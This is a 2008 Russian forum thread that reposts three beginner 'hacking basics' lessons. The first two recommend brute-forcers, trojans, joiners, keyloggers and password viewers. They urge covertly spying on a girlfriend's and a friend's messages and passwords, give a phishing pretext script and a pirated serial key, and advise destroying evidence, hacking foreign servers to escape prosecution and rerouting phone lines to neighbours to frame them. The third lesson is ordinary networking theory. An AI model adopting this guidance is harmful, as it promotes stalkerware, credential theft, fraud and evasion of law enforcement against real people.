Как стать хакером
 
 

Это мой форум. Вы можете создавать темы и участвовать в их обсуждении.

Добавить в избранное
 
 
 
 

Если ты ещё не хакер тебе сюда! (Уроки для хакеров)

Создать темуСоздать тему | К списку

ДобавилТекст

Anonymous
Если ты ещё не хакер тебе сюда! (Уроки для хакеров)
2109 дней назад 09.07.2008 19:15:27 Цитата('1948717','941756','6','870')">Сообщить о спаме

Основы хакерства. Урок 1
[ Хакерство для новичков ]


В этом уроке будут рассмотрены следующие две темы: введение и инструменты хакера.

Введение
Привет, читатель. Год назад я пришёл на ХЗ, и очень хотел стать хакером. Никто не мог мне обьяснить многие простые вещи, я видел много опытных, но стать на путь хакера мне помогли буквально единицы. И я могу их назвать: PinkPanther, DrWeb, R_a_ID_e_R. Я обучался сам, не надеясь ни на чью помощь, стараясь описывать свои познания в статьях для новичков. Так шло время, менялись поколения... Я не хочу усложнять жизнь ньюбов, я всегда к ним хорошо относился, и я считаю, что новички меют право знать. Тот, кто скажет, что я неправ, что мол "пусть сами разбираются, только так они вырастут", и прав и неправ. Да, упорные достигнут своей цели, но человек, которому это не надо, просто не будет читать эту статью. Тем, кто до сих пор мучает поисковики вопросами типа "как стать хакером" я решил посвятить цикл уроков, а может, и книгу. Ты пройдёшь путь от ламмера до хакера, изучишь технологии программирования, взлома и многое-многое другое. Проходи этот путь по моим урокам, и всё будет ОК. Это первый урок, посвящённый азам хакерства, он скорее завлекающий. Помни, всё это только игрушки, а настоящее хакерство пойдёт потом. А на этом этапе ты должен решить, нужно оно тебе, или нет. Постепенно мы изучим сетевые технологии, ты узнаешь, как устроен Интернет, что можно в нём найти интересного, что можно, а что нельзя. Добро пожаловать в наш мир!

Инструменты хакера
В этом разделе я опишу джентльменский набор хакера. Этими инструментами мы будем иногда пользоваться в дальнейшем.

- Брутфорс
- Сканнер портов
- Сканнер безопасности
- Джойнер
- Mail Bomber
- Bзлом паролей Windows
- Просмотр паролей
- Троян
- KeyLogger
- Скрыватель IP (прокси/сокс)
- Подмена HTTP-запросов

Начнём по порядку:

[Брутфорс]. Bruteforce (в переводе с английского "грубая сила") применяется для подбора паролей от e-mail и ftp-серверов. Существует много видов программ-брутфорсов, но их способности схожи. При использовании таких программ на dial-up соединениях, где скорость не превышает 56 Кбит/сек, подбор может длиться долго и нудно, при использовании же скоростного интернета (ADSL, оптоволокно, спутник, и т.д.) скорость подбора увеличивается, однако тогда сьедается немало траффика. Оптимальный вариант - подбор по словарю. Взломщик составляет текстовый документ из возможных паролей жертвы, программа подключается на заданный ей сервер и по очереди перебирает пароли из файла. Если производится подбор паролей к почтовому ящику, нужно указать брутфорсу сервер входящих сообщений жертвы, например, если мы ломаем мыло vasia@pupkin.ru , то чаще всего сервером будет pop.pupkin.ru. Если же мы ломаем не e-mail, а сайт pupkin.ru, то надо указать ftp-сервер, это будет ftp.pupkin.ru . Брутфорсы имеют ещё массу полезных настроек, например, если ты подсмотрел, что твой друг вводит пароль из 5 символов, и первый его символ L, то тебе надо использовать подбор по маске. Маска будет выглядеть так: L#### . Я привёл общее описание, а для более близкого знакомства советую скачать wwwHack.

[Сканнер портов]
Поскольку этот урок - введение, сетевыми технологиями я тебя буду мучить в другой раз, но это всё равно надо знать.
Сканнеры портов проверяют заданный диапазон IP-адресов на заданный открытый порт. Если порт открыт, этот IP добавляется в список.
Где это применяется? Создатели так называемых "троянов" иногда предусматривают сканнер портов в своих творениях. Дело в том, что сервер
трояна, попадая на машину, открывает в системе порт, по которому он получает команды клиента. Для тех, кто еще не догадался, обьясню: Зная,
какой порт открывает наш троян, мы "спрашиваем каждый компьютер диапазона", открыт ли этот порт, и если это так, значит на этой машине
сидит наш трой - можно смело коннектиться и управлять этим компьютером. Я рекомендую использовать Essentional Net Tools, так как это
хороший сканнер с дополнительным набором функций. Это не просто сканнер - имей ввиду. За время своего существования он стал
легендарным, и ещё не теряет своей актуальности. Он платный. Брат мой купил и дал мне серийник от версии 1.1:
Name: Jan Klaassen
S/N: 2957888021

[Сканнер безопасности]
В Интернете существует два типа страниц: статические(HTML) и динамические(PHP,ASP,CGI). Если расширение страницы htm, html, это означает, что сожержимое страницы не зависит от пользователя и всегда неизменное - "статическое". Динамические страницы обрабатывают данные, полученные от пользователя, грубо говоря, они умеют думать. Естественно, ни о каких дырах в html-страницах и речи быть не может, дыры бывают только в скриптах динамических страниц. Самые распространенные уязвимости - XSS. Их хорошо описал DrWeb в статье "XSS новичкам", поэтому их суть я обьяснять не буду. Для автоматизации поиска уязвимостей XSS (и не только) хакеры используют сканнеры безопасности. Я рекомендую XSpider.

[Джойнер] - (англ. Join - соединить, обьединить).
Джойнер - это программа, позволяющая обьединять несколько файлов один, с возможностью приклеивать к полученному файлу произвольную иконку. Таким образом, используя джойнер, хакер может склеить троянского коня с какой-либо полезной утилитой, и спихнуть это жертве. Та, в свою очередь, открывая файл, считает, что запускает свою прогу, хотя фактически их запускается две(три, четыре, и т.д.), просто троян себя не выдаёт. Минус такого подхода в том, что большинство джойнеров определяются антивирусами.

[mail bomber]
Этот тип программ предназначен для "бомбления" электронной почты, т.е. закидывания огромным числом писем. Mail-бомберы широко используются спаммерами. Лично я спаммером не являюсь, но использую Ganja Spammer для подмены адреса отправителя. Очень удобно при занятиях "фишингом". Что это такое - расскажу позже.

[Пароли Windows]
Я уважаю продукты компании InsidePro, и советую закачивать их. Это: PasswordsPro, MD5Inside, PWLInside, SAMInside. Предназначение программ уже заложено в их названии, но я расскажу о каждой в отдельности.
SAMinside - программа для взлома файла SAM. В Windows 2k/XP пароли пользователей хранятся в директории windowssystem32config, и называются соотв. SAM и SYSTEM, без расширения. Чтобы их скопировать для расшифровки, придётся юзать dos или альтернативную ОСь, как Windows PE. Так вот, пароли хранятся в зашифрованном виде, и чтобы их расшифровать, у тебя должны быть копии этих файлов. Надо забить их в SAMinside, поставить способ перебора, и ждать.
PWLinside - аналогично, только это для ныне мёртвых Windows 95/98, где пароли (в т.ч. на инет) хранятся в директории винды в файлах, имеющих расширение *.PWL.
MD5inside - расшифровывает MD5-хэш, используемый во многих системах авторизации. Расшифровав хэш, можно получить пароль. Кстати, в форумах IPB примерно такой хэш хранится в кукисах.
PasswordsPro - мощный инструмент для работы с паролями, имеет все функции MD5inside, генерация хэшей, также он может показывать пароли, скрытые за звёздочками, для этого надо включить соотв. режим и навести мышей на поле с паролем.

[Просмотр паролей]
Если тебе интересно знать, что друг пишет твоей невесте по e-mail, достаточно прити к нему домой и отправить варить кофе, а в это время достаём дискетку и запускаем прогу, показывающую все его пассы, от мыла в том числе. Магия? Нет! Всё дело в том, что для удобства, чтобы избавить тебя от кайфа каждый раз при авторизации на сайте, в аське и т.д. вводить пароль, браузеры/аськи/почтовики его запоминают. Вот за это их и наказывают). Существует множество программ, показывающих всевозможные сохранённые пароли. Чтобы посмотреть, что там насохранял IE и Outgluk Express, можно воспользоваться программой PSPV. Для TheBat - TheBatPasswordViewer, для ICQ/Trillian/Miranda etc. - Advanced Instant Messenger Password Recovery, сокращенно AIMPR.

[Троянская лошадь]
Вот и подобрались к самому интересному). Этот подвид зверей так называется потому что действует подобно знаменитому троянскому коню. Проникая в систему пользователя, он там осваивается и работает на хозяина. Что я имею ввиду? В отличие от вируса, троян безобиден, если ты не в сети. Он активизируется, когда его создатель посылает ему команды через LAN или Интернет, например, он может по команде отправить хозяину твои пароли, и ещё много чего интересного, также позволяет взломщику лазить по твоим файлам и реестру, вобщем суть ты понял, а возможности у них у всех разные. Самые популярные троянцы: ALB, NetBus, LamerDeath. Но только вот все они уже давно палятся. А мой собственный называется LamerHack, можете поискать на моем сайте, и не парится, но сейчас доступна ещё слабенькая бета-версия, кроме того непалимость компенсируется размером сервера.

[KeyLogger]
Кейлоггер - это по-русски "клавиатурный шпион". Он отлавливает все твои нажатия клавиш и записывает их в файл, после чего может отправить их своему создателю, либо сохранить на винт. Полезно ставить у подруги - он запишет всё, что кому она пишет по аське.

[Proxy]
Если ты занимаешься чем-то не совсем законным, то тебя вряд ли устроит то, что на взломанном тобой сервере останется твой IP-адрес, по которому тебя вычислить нефиг делать. И что в таком случае? Существует такая вещь, называемая прокси-сервером, или сокс-сервером. Я не буду вдаваться в тонкости и обьяснять тебе, чем они отличаются - на данном этапе тебе это неважно. Суть одна - заменяется твой IP-адрес на адрес proxy-сервера. Это ипользуется, когда есть какие-то ограничения на твой IP, например, обьем музыки для скачивания, либо ограниченное число попыток регистрации аськи. А для самого первого случая нужно использовать анонимные или элитные прокси. Их недостаток - непостоянность. Они меняются каждые n часов. Всегда свежий список проксей находится здесь. В качестве программы для использования proxy я советую A4proxy.

[Подмена HTTP-пакетов]
Это я тоже буду описывать более подробно в будущих уроках. Вся информация в Сети передвётся т.н. "пакетами". Подобно пакетам секретной информации на войне, HTTP-пакеты имеют начинку и надпись: кому/куда и т.д. , с той лишь разницей, что ЭТА информация особо секретной не считается, но вызывает интерес. В заголовке пакета находится информация о браузере, откуда мы пришли, и каким скриптам какие данные передаются. Как ты понял, речь пойдёт о подмене этих данных. Возникает вопрос: "А зачем?" . А затем. Рассмотрим лучше на примере. У нас в Днепропетровске очень популярный интернет-провайдер "Алькар Телепорт". Он содержит несколько сайтов с интересными ресурсами, которые доступны только его пользователям. При заходе с других провов, они посылают нафиг. А как же эти сайты проверяют, откуда я пришел? По IP. Если, допустим, IP вида 212.15.x.x , то доступ разрешен. А если заменить referer(откуда я появился) на адрес самого сервера, то, скорее всего, он не будет нам ничего запрещать. Используется программа InetCrack, качаем её.

Конечно, в этом разделе были описаны далеко не все программы, но основные.


Владислав Новик aka VladUha::HackZona.Ru



---
Пиратия форева. Хакинг форева, Рок форева.

Комментарии: 11 Просмотров: 99211

Anonymous
Основы хакерства. Урок 2
2109 дней назад 09.07.2008 19:17:08 Цитата('1948717','941756','6','871')">Сообщить о спаме

Основы хакерства. Урок 2
[ Хакерство для новичков ]


Основы


В этом уроке будут рассмотрены следующие темы:



-Психология хакера. Идеальный хакер

-Ответственность

-Путь хакера

-Атрибуты хакера




Психология хакера

У многих слово "хакер" ассоциируется с эдаким ботаником, день и ночь взламывающим банки и переводящим себе кучу денежек,
неустанно бесперерывно сносящим сотни серверов одним ударом без причины. Хочу тебе сказать, что эта мысль в корне
неправильная. В этом уроке мы пока еще не будем вскрывать банки (ну разве что банку пива:)), мы поговорим о том, кто такие
хакеры, что они делают и какими мотивами руководствуются.

Согласно определению, хакер - человек, увлекающийся компьютерами, и испытывающий желание знать о них всё. Запомни, что просто
так ничего не происходит, и У любого взлома есть цель, мотив, взломщик и ОТВЕТСТВЕННОСТЬ.
При взломе хакером движет элементарное любопытство, желание проникнуть внутрь, найти уязвимость. Если ты со мной не согласен,
тебе просто нет смысла читать дальше.
Ламмер - это не тот, кто не знает, а тот, кто не стремится.
Хакер - это вселенский энтузиаст. Давайте будем энтузиастами. Для начала ты должен уметь использовать поисковики. В Инете
говорят, google - твой лучший друг. Если у тебя есть какой-либо вопрос, не спеши с ним на форум, поищи уже готовые ответы,
ведь наверняка ты не первый, кто его задает. Если ты научишься владеть поисковиком, то дальнейшее изучение не составит
проблем. На 90% твоих вопросов ответы есть в Интернете. Конечно, кое-чему научу тебя я, но я же не старик }{отт@бь)ч, я
специализируюсь на конкретных направлениях и языках, которые мне интересны. Так сложилось, что я изучаю Delphi, а не C++ или
VB, хотя в будущем планирую изучить и их. Я веду к тому, что ты сам выбираешь то, что тебе больше интересно, и я не
всезнающий оракул. Рано или поздно придет время самостоятельно принимать решения, находить выходы из ситуаций. Именно этому
я тебя учу - ты должен обладать творческим мышлением, уметь адаптироваться к новым условиям. Программирование - это прежде
всего творчество, ведь написание или хотя бы мысленное составление алгоритма - процесс творческий, а уже написание
программного кода по готовому алгогритму зависит только от языка, и труда не составит. Но всем этим "творчеством" мы будем
заниматься все равно в рамках Delphi). Это что касается программирования.

Так уж исторически повелось, что базовый язык для машин, в т.ч. компьютеров - английский. Если ты не обладаешь хотя бы
базовыми знаниями английского, тебе придется туго. В этом случае можешь уже идти записываться на соответствующие курсы.

И конечно, ты должен обучиться быстрому набору. ИМХО, Соло 6 - это все фигня. Как и слепой набор, фыва-олдж - это придет со
временем. Лично я нехило обучился с помощью программки speed-o-meter. Сейчас ее у меня уже нет, посему линк не дам, поищи в
Сети. Ты должен быстро и правильно набрать то, что содержится в поле. Офигенная вещь!





Что же за ответственность? Я думаю, догадаться несложно. Существуют статьи УК, в которых описаны наказания за
компьютерные преступления. Приведу их:

Кардер.

Статья 159. Мошенничество

Статья 165. Причинение имущественного ущерба
путем обмана или злоупотребления доверием

Статья 183. Незаконное получение и
разглашение сведений, составляющих
коммерческую или банковскую тайну

Статья
187. Изготовление или сбыт поддельных
кредитных либо расчетных карт и иных
платежных документов

Статья 272. Неправомерный доступ к
компьютерной информации

Статья 273. Создание, использование и
распространение вредоносных программ для
ЭВМ
Фрикер.
Статьи КоАП РСФСР

Статья 137. Изготовление и использование
радиопередающих устройств без разрешения

Статья 138. Нарушение правил приобретения,
установки, строительства и эксплуатации
радиоэлектронных средств

Статья 139. Нарушение правил охраны линий и
сооружений связи
Статьи УК РФ
Статья 137. Нарушение неприкосновенности
частной жизни

Статья 138. Нарушение тайны переписки,
телефонных переговоров, почтовых,
телеграфных или иных сообщений

Статья 183. Незаконное получение и
разглашение сведений, составляющих
коммерческую или банковскую тайну
Хакер
Статья 272. Неправомерный доступ к
компьютерной информации

Статья 273. Создание, использование и
распространение вредоносных программ для
ЭВМ
Не буду приводить формулировок и санкций
этих статей, их без труда найдете сами. Все
выше перечисленное не говорит, что вас будут
судить лишь по этим статьям, все зависит от
обстоятельств и ваших действий, есть еще
статьи 30-я “Приготовление и покушение на
преступление” (доказать очень трудно), 146-я
и 147-я авторские и патентные права (инфа,
которую вы только что скачали, могла
охраняться законом), и еще много не Бог
весть чего. Кроме того, существуют
различные комментарии, но еще не факт, что
судья будет их читать. Доказать сам факт
преступления трудно. Например если вы
подобрали пароль вошли на сервер при этом
не была нарушена работа средств защиты (Ст.
272 модификация, блокирование) пошарились,
почитали, оставили все как есть и ушли, даже
если вас обнаружили, состав преступления
отсутствует, но если в этот момент на сервер
не мог войти владелец пароля (блокирование),
то состав уже есть. Сканирование портов
вообще не попадает ни под одну статью,
представьте вы ходите по дому и ищете
открытую дверь, это не значит, что если вы ее
найдете то зайдете туда. Таких примеров
очень и очень много, надо лишь их найти. Я не
хочу сказать, что типа все тип-топ, живите
спокойно никто вас не тронет, на этом сайте
уже было высказано мнение, что ловят:
а) Лохов

б) Жадин Даже будь ты трижды крут, ты можешь круто
лохануться, ну а если хочешь получать
выгоду от своей хакерской деятельности (см.
пункт b), то тогда начнут накапливаться
вещественные улики и свидетельства против
тебя. Пример из жизни: ребята занималась
взломом аккаунтов частных организаций, все
было хорошо аккаунтов было много их трафик
не превышал 20% от общего их никто не палил.
Потом они решили продавать доступ другим,
причем сажали по несколько человек на
аккаунт (см. пункт b), те в свою очередь
начинали качать mp3 и все такое. В результате
трафик в некоторых фирмах подскочил на
200-300%. В итоге когда к одному челу который
юзал халявный инет пришла милиция, он сразу
назвал имя, адрес, телефон и номер
троллейбуса на котором надо ехать к челу
который продал ему доступ (см. пункт а).
Теперь об отмазках, их достаточно много. Под
психа косить не стоит – принудительное
лечение в больнице тюремного типа, санитары
изверги, неизвестные лекарства
психотропного действия, выйдете точно
психом. Стучать тоже не имеет смысла если вы
при этом не предотвратите преступления,
кроме того нет никаких гарантий, что вам
это зачтется. Одной из самых мощнейших
отмазок является ст.13 ч.1 “Граждане
Российской Федерации, совершившие
преступление на территории иностранного
государства, не подлежат выдаче этому
государству”, вспомните где и когда
арестовали Левина, ломайте иностранные
серваки и все будет в порядке. Еще есть ст. 14
“Понятие преступления” ч.2 “Не является
преступлением действие (бездействие), хотя
формально и содержащее признаки какого-либо
деяния, предусмотренного настоящим
Кодексом, но в силу малозначительности не
представляющее общественной опасности, то
есть не причинившее вреда и не создавшее
угрозы причинения вреда личности, обществу
или государству”, хотя в нашей стране могут
посадить за ведро картошки, не знаю, может ли
это реально помочь. Можно сослаться на
неосторожность т.е. “знал что может
случиться что-то нехорошее, но не думал, что
до этого дойдет” - легкомыслие, и “не знал
что может что-то случиться, хотя вполне
должен был” - небрежность. Еще есть ст. 28 “Невинность
преступления” не знал и не предвидел или
знал, но не мог предотвратить. Смягчающие
обстоятельства: первое преступление,
несовершеннолетие, явка с повинной,
возмещение материального ущерба (может не
прокатить в предыдущем примере ребятам
закатили такой счет, что они решили, что
лучше “самый гуманный суд в мире”).
Последние два обстоятельства самые
действенные получите три четвертых от
максимального срока или размера наказания.
Большую роль играет умысел, если не имел
место злой умысел, то наказание будет
гораздо мягче.
Если вас несколько человек, то не стоит
сильно шифроваться “… явки, пароли, чужие
дачи…” могут сильно навредить вам,
особенно если ваша конечная цель получение
прибыли, преступление расценивается “…совершенным
организованной группой, если оно совершено
устойчивой группой лиц, заранее
объединившихся для совершения одного или
нескольких преступлений” ст35 ч.3. Разница
между “группой лиц” и “организованной
группой” по разным статьям плюс-минус 3 - 4
года, не считая штрафов. Вообще всеми “денежными”
делами лучше заниматься одному, проще
отмазаться, а еще лучше вообще ими не
заниматься если нет особой нужды или
хорошего адвоката. Если же вы все же
решитесь создать “организованную группу”,
чего я вам настоятельно не советую делать,
то читайте на ночь не детективные книжки, а
уголовный кодекс и книги о тюремной жизни.
Тем, кто занимается хаком в одиночку.
Не храните ничего такого на диске, в том
числе учебники по хаку и просто сохраненные
страницы соответствующего содержания, не
говоря уже о софте - могут быть приобщены к
делу по 30 статье подготовка к преступлению,
не стоит концентрироваться на скоростных
способах убивания винта. Не стоит надеяться
на то, что в вашу металлическую дверь
постучат и скажут “Откройте, милиция!”
если так произойдет, можете быть спокойны –
это не к вам. Вот возможные методы
проникновения в вашу квартиру (взято из
лекции Московского военного института “Тактика
обыска и выемки”):


“Заход на плечах”, когда сотрудники группы захвата входят с заходящим или выходящим человеком.

При выходе подозреваемого (то есть вас) из квартиры

Проникновение в помещение сотрудников группы захвата с помощью специальных средств через окна, балконные двери и т.д.

Этот вариант применяется в случаях, когда
входные двери укреплены и подходы к
помещению контролируются подозреваемыми.



В лекции эти способы описаны в качестве
примера проникновения в помещения
оборудованные бронированными дверьми с
подозреваемыми в торговле наркотиками и
вполне могут быть применены к вам. Причем
это сопровождается выключением
электричества и, возможно, телефона, также
осуществляется контроль за окнами
помещения. Может прийти “почтальон” или “работник
ГТС”. Таким образом времени на то, чтобы
уничтожить информацию будет мало, если оно
вообще будет. Ни я ни мои друзья не
сталкивались с управлением Р, но мои друзья
сталкивались с ОБЭП и налоговой полицией,
когда они заходили они точно знали, что им
нужно и где что лежит. Следует полагать, что
с Р будет также. Храните все на дискетах на
уничтожение одной дискеты уходит 5-10 секунд,
перегибаете пополам до характерного хруста
вытаскиваете диск мнете. Много инфы - юзайте
зип ломается за… не знаю не ломал, или
скидывайте все на матрицы портится тоже
очень быстро шкуркой, зажигалкой, на худой
конец просто ручками перегибаете пополам
до характерного хруста и не забудьте иметь
под рукой длинную иглу чтобы открыть CD-ROM,
надеюсь не надо объяснять как ей
пользоваться. Не храните носители дома если
они не нужны на данный момент, если они
нужны держите их под рукой, чтобы оперативно
уничтожить, не прячьте ничего в аудио-видео
технику, она будет соответствующем образом
проверяться. Если занимаетесь своей
деятельностью эпизодически не ленитесь
перекидывать в распределительной коробке (РК),
свои телефонные пары на соседские, при этом
оставив следы подключения на своих парах,
мол вы тоже жертва. РК порой бывают недоступны, большой замок на щитке закрытая
коридорная дверь, любопытные соседи, замок
будет в любом случае закрытый или не
закрытый, но будет достать к нему достать
ключ проблем не доставит (только не
спрашивайте у соседей). Кроме того, если к
вам придут, провода проверят в первую
очередь - все ли там в порядке. Лучше, если
позволяют средства купите радиотелефон,
схему подключения модема к трубе несложно
найти в инете, подключаетесь в другом доме
пусть ищут, найдут базу от телефона пусть
оставят себе – свобода дороже. Хотя они
могут оставить все как есть и попробуют
запеленговать, где вы со своей трубой сидите,
по этому труба не выход из всех бед, ищите
свой метод. Способов установки базы
описывать не буду, потому как таким образом
как я скажу вы ее уже не установите. Кроме РК
существуют распределительные шкафы на
несколько сот пар, стоящие на улице, но
толку
от них мало, сомнительно что вы найдете там
свою пару, места для установки базы там
маловато да и питание неоткуда взять.
Можете просто ради интереса посмотреть как
все устроено, большинство из них ни каких
замков не имеет, только хитро продуманные
запоры под шестигранный ключ на М10 или
больше точно не помню (можно попробовать
болтом) на мой взгляд ни чего интересного
там нет, куча проводов и все. Напоследок
хотелось бы сказать не делайте ни чего
такого, что впоследствии осложнит вам жизнь.
Помни, готовясь к чему-нибудь серьезному
используй всю информацию полученную в
общедоступных источниках лишь как пример, а
не как руководство к действию.


По-моему всё понятно. Это вырезано из электронного журнала "Хакер". От себя я могу сказать, что лучше всего хранить конфиденциальные данные
на CD в запароленном архиве с очень сложным паролем и измененным расширением. И носить этот диск с собой, чтобы в случае чего сразу его >-
К чему я веду? Существует документ, получивший название "Конституция Хакера", почитай его.
Там изложены принципы обучения идеального хакера, запомни - это твой кодекс. Это не значит, что ты должен по нему жить, но старайся придерживаться для себя этих правил, и ты достигнешь своей
цели. Как там сказано, "это не необходимость, но простая вежливость".



О чертах хакера. Что помогает нам при взломе? Упорство, опыт, логика и соответствующее мышление.






Путь хакера

Здесь и сейчас, с этого момента, начинается твой путь в хакеры. Где-то в Интернете я видел интересное высказывание: лучший админ - это хакер, и наоборот - лучший хакер - злой админ.
Отчасти это правда. Подобно тому, как хороший боец должен хорошо владеть оружием, хакер должен хорошо владеть компьютером. Они знают по нескольку языков программирования, разбираются в операционных
системах, знают, как устроен компьютер и могут собрать и разобрать его за 45 секунд). Чтобы успешно находить уязвимости в
скриптах, ты должен знать, по какому принципу они работают, а чтобы это понять, надо знать язык, на котором они написаны.
Не обязательно знать прям всё, но что-либо альтернативное из каждой группы языков ты должен выбрать. Вот основные языки,
которыми пользуются хакеры. Из каждой группы вибери один-два языка:

Ассемблер
Delphi | C++ | Visual Basic
HTML, XML, WML
PHP | ASP | JSP | Perl
SQL и кoмпания


Не обязательно учить всё сразу, чтоб не говорил, что я тебя запугиваю. Жирным выделены обязательные языки. По возможности
найди как можно больше учебников для дальнейшего изучения.

Ассемблер используется для взлома shareware-программ, для создания кряков и кейгенов. Дальше. HTML, PHP, ASP, Perl, JavaScript, VBS, JSP, и многие другие обьединяют в одну группу - это
"веб-языки". При помощи них создаются веб-сайты, например HackZona написана на PHP. HTML - это не язык программирования. Его
название переводится как "HyperText Markup Language" - "язык гипертекстовой разметки". Т.е. при помощи него не программируют,
а только "размечают" документ, показывая компьютеру, где какие данные должны быть. Как говорилось в предыдущем уроке, если
при написании сайта ограничиваться только этим языком, то мы просто задаём: здесь рисунок, а тут ссылка, а тут такой-то текст.
Таким образом, при каждой загрузке страницы мы увидим одно и то же: рисунок, ссылка, текст. А вот если прикрутить к документу
скрипт, написанный на PHP, мы можем указать, что при загрузке рисунка можно выбрать из базы данных, например, ту картинку, что
нравится пользователю. Таким образом, они друг друга дополняют. Ты должен чётко ощущать разницу между веб-дизайном и веб-программированием.


XML - это тоже язык гипертекстовой разметки, дающий большую гибкость, чем HTML, однако, его тебе пока учить не стоит.
WML - разномидность XML, используется для создания wap-сайтов.

PHP и Perl - наиболее часто используемые языки веб-программирования.

CSS - каскадные таблицы стилей. Это надстройка HTML, используется для визуального украшения документа - неподчёркнутые
ссылки, цвет полосы прокрутки, рамки, анимация, и многое-многое другое. Оригинальная версия этой статьи написана с
использованием css. Украшены ссылки, элементы списков, рамки для кода и правил, и др. Если ты читаешь статью с HackZona.ru,
то перед тобой не оригинальная статья, хотя это никак не отражается на сути урока.


Delphi, C++, C#, Java, Visual Basic, QBasic, Dark Basic, Pascal, Fortran, etc. - это "прикладные" языки. Приложения, созданные
в этих средах разработки, носят расширение *.exe . {+ хотя файлы php - тоже приложения +}
Kylix - это Delphi под Linux.
SQL - язык баз данных. Ты, наверное, слышал термин SQL injection? Мы к нему вернёмся через несколько уроков. Это уязвимость,
позволяющая хакеру вытаскивать данные из базы, передавая их вместе с PHP-запросом. И для этого нужно изучить SQL.

Ты сам понимаешь, что учить тебя этим языкам я не буду, я буду учить тебя их использовать. То, что тебя интересует, найдёшь
сам, посему, поехали дальше.



Существуют разные подвиды хакеров, занимающиеся разными видами деятельности:

Веб-хакинг
Крэкинг
Фрикинг
Социнженеринг/фишинг
Кардинг


От того, кем ты хочешь быть, зависит, что ты должен знать. Не существует единого компромисса, но на мой взгляд, лучше тебе
сейчас учиться на универсального хакера и изучать первые четыре варианта сразу. Лично я их и выбрал. Теперь опишу каждый из них:



Вэб-хакеры ищут уязвимости в веб-скриптах и изучают строение сайтов. Они, соответственно, изучают веб-языки.



Крэкеры (это не печенье;)) занимаются исследованием начинки программного обеспечения, в частности получение алгоритма
генерации серийного номера в платных программах, исп. для создания кейгенераторов. Для этого надо знать ассемблер, чтобы понимать, как устроена программа.



Фрикеров часто связывают с электроникой. Фрикер - любитель халявы, который привык не платить за услуги, связанные с электроникой. К этому относят взлом таксофонов, счетчиков, теликов, и т.д. и т.п.
Естественно, чтобы этим заниматься, нужно иметь глубокие познания в электронике. Мой папа по образованию - инженер-электронищик. Я 16 лет жил в одной квартире с
величайшим фрикером, не зная этого.



Социальная инженерия - это единственная наука из всех названных, направленная не на взлом компьютера, а на взлом человека.
Сейчас в Сети очень много ламмеров, и элементарно выманить их пароли оказывается достаточно просто. Например, выдать себя за
админа почтового сервиса, или тех. консультанта организации, и сказать, что мол поступила жалоба на спам с Вашего ящика, если
не хотите его удаления, отошлите такое-то письмо на почтовый робот такой-то, укажите свой логин, пароль, и этот код доступа:
46655529 (цифры наугад), и он поверит. Социнженеринг(далее СИ) применяется там, где единственное уязвимое место в системе -
пользователь. Пример: зачем ломать mail.ru если можно обмануть юзера?

Кардинг - манипуляции с кредитками, мардинг - маниакальное уничтожение взломанных систем. На этих пунктах мы останавливаться
не будем по понятным причинам.

Конечно, кое-кто раскритикует такое разделение, но новички должны знать эти понятия. Не бывает так, что хакер опытен только
в одном деле и безразличен к другим направлениям. Это деление чисто условное.

Кодинг - программирование с точки зрения хакерства.



Всё, ты уже стал на путь хакерства. Вводные уроки закончились, в следующий раз мы поговорим о более серьезных вещах. Я начну
рассказывать тебе о том, как устроен Интернет, какая в нем адресация, что такое IP,порты,proxy.


OffTopic

А в этом разделе я буду делать заметки к статьям, давать ссылки на ресурсы, и некоторую полезную информацию.
Так.. В статье упоминалось об "оригинальной версии". Фильтр HZ не позволяет в полной мере показать красоту статьи, поэтому
количество и оформление тегов приходится урезать для того, чтобы статья правильно отобразилась здесь. А те версии, которые
я творю изначально, можно просмотреть в галеерее Zero Byte. Кроме понятного
красивого оформления в них, там где надо, есть иллюстрации. Хотя в первых 2х уроках нет... Насчет оригиналов я повторяться
больше не буду.

Теперь такой вопрос: ShineShadow мне написал, что я многое упустил в первом уроке. И он почти полностью прав. Мне стыдно...
Мы это нагоним в будущем, по мере необходимости.

---

Поищи в Сети учебник "HTML.Первые шаги". Для ознакомления с HTML это просто НАХОДКА. Учебник написан понятным языком, с
примерами кода, иллюстрациями. Респект автору. Кстати, по-моему, его родной сайт www.postroika.ru

Для изучения PHP советую найти учебник Энди Харриса "php programming for the absolute beginner". Аналогично - понятно и просто.


Всё. До следующего раза.


VladUha::HackZona


Примечание Цензора: Перепечатка возможна только с разрешения автора с указанием ссылки на HackZona.Ru



---
Пиратия форева. Хакинг форева, Рок форева.

Anonymous
Основы хакерства. Урок 3
2109 дней назад 09.07.2008 19:18:33 Цитата('1948717','941756','6','872')">Сообщить о спаме

Основы хакерства. Урок 3
[ Хакерство для новичков ]


Основы хакерства. Урок 3
Основы


Сегодня мы поговорим о том, как устроен Интернет, об IP-сетях и адресации. Я не буду изобретать велосипед, в Сети очень много полезной информации по этой теме. Я приведу основные понятия, обьясню некоторые трудности. Итак, темы нашего сегодняшнего урока:
Что такое сети
Какие бывают сети
Сетевое оборудование
Адресация в сетях
порты, протоколы, OSI
ARPAnet aka Internet
Говоря о понятии СЕТЬ, надо сказать, что сети бывают разные, но принцип действия всех сетей один: Компьютерная сеть - это два и более компьютеров, логически связанных через канал связи - кабель, беспроводная связь. Я думаю, обьяснять это не надо, все это и так знают), поэтому расскажу лучше о типах сеток.

LAN (Local Area Network) - самые маленькие, локальные сети. Компьтеры таких сетей обычно расположены на небольшой территории, связаны между собой при помощи высокоскоростного кабеля, скоростью до 100МБит/сек. Их устанавливают в учебных заведениях, дома, и на небольших предприятиях.

WAN (Wide Area Network) - это так называемые "глобальные сети", такие, как Интернет. Компьютеры таких сетей могут находиться в разных уголках земного шара! Конечно, никто не будет прокладывать кабель на столь значительные растояния, поэтому WAN используют уже существующие линии связи, телефон, например. Естественно, от этого значительно падает скорость, но при таких расстояниях это единственно правильное решение.

MAN (Megapolis Area Network) - городские сети. Расслабься, у нас таких нет). Хотя я никогда их не видел, ... Это большая локальная сеть, чаще всего оптоволоконная, при подключении к которой у тебя есть и инет, и LAN на весь город. В Днепропетровске что-то подобное делает контора "Маша и медведь". Если интересно, посмотри тут, если нет - правильно)), поехали дальше.

Остановимся пока на небольших сетях, LAN. Давай углубимся в теорию и попытаемся понять, как это работает.
Наверняка ты уже видел эти сети, это их самый распространенный вид.

Топология сети - это вид связи ее компьютеров.
Полносвязная топология - это когда каждый компьютер при любых условиях связан со всеми остальными, работающими в данный момент, и выглядит это так (http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...

Топология "Кольцо" - в сетях с этой топологией данные передаются по кольцу от одного компьютера к другому, а компьютер, получая данные, проверяет, ему ли они адресованы, и если нет, передает их дальше, пока они не придут к отправителю.
